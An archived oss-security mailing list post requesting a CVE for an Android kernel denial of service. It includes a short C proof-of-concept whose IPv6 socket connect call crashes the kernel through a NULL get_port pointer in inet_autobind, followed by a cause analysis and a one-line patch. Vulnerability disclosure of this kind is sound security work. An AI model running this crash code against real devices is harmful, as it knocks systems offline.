Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 9 Dec 2015 10:15:46 +0000
From: 郭永刚 <guoyonggang@....cn>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: CVE request - Android kernel - IPv6 connect cause a denial of
 service


POC:
#include <linux/types.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <pthread.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <netinet/in.h>
int main(void){

         int socket_fd;
         struct sockaddr_in addr;
         addr.sin_port = 0;
         addr.sin_addr.s_addr = INADDR_ANY;
         addr.sin_family = 10;

         socket_fd = socket(10,3,0x40000000);
         connect(socket_fd , &addr,16);

         return 0;

}

Analysis of causes:
In the file net/ipv4/af_inet.c , It will cause pc is 0x0  , if the sk->sk_prot->get_port is NULL.
static int inet_autobind(struct sock *sk)
{
         struct inet_sock *inet;
         /* We may need to bind the socket. */
         lock_sock(sk);
         inet = inet_sk(sk);
         if (!inet->inet_num) {
                   if (sk->sk_prot->get_port(sk, 0)) {
                            release_sock(sk);
                            return -EAGAIN;
                   }
                   inet->inet_sport = htons(inet->inet_num);
         }
         release_sock(sk);
         return 0;
}

Solution:

         Add check as follow:
                  if (sk->sk_prot->get_port &&sk->sk_prot->get_port(sk, 0)) {
                            release_sock(sk);
                            return -EAGAIN;
                   }

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.